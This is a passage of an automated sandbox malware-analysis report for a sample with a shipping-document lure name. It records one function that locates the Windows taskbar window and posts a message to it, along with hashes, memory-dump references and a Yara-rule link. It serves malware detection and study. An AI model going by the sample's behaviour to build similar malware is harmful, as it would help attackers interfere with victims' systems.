                                                                • Instruction Fuzzy Hash: EED0A931384300BAE664AB749D0FFA72610AB48B20F000824B209AA0D0CCE0A800C664
                                                                Function 009B5964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009B596E
                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 009B5981
                                                                  • Part of subcall function 00995244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009952BC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: FindMessagePostSleepWindow
                                                                • String ID: Shell_TrayWnd
                                                                • API String ID: 529655941-2988720461
                                                                • Opcode ID: 178f0f2867f9d4ba03c4c49fd8870e353930ce5a78f560e883a2b165604c06c8
                                                                • Instruction ID: a252beedcb88ac7951d14d2ff309384d8b2ba99d42c9511814aed909f99fc44b
                                                                • Opcode Fuzzy Hash: 178f0f2867f9d4ba03c4c49fd8870e353930ce5a78f560e883a2b165604c06c8
                                                                • Instruction Fuzzy Hash: 5ED0C931798711B6E664AB749D1FFA76A14AB44B60F010925B659AA1D0CDE09800D664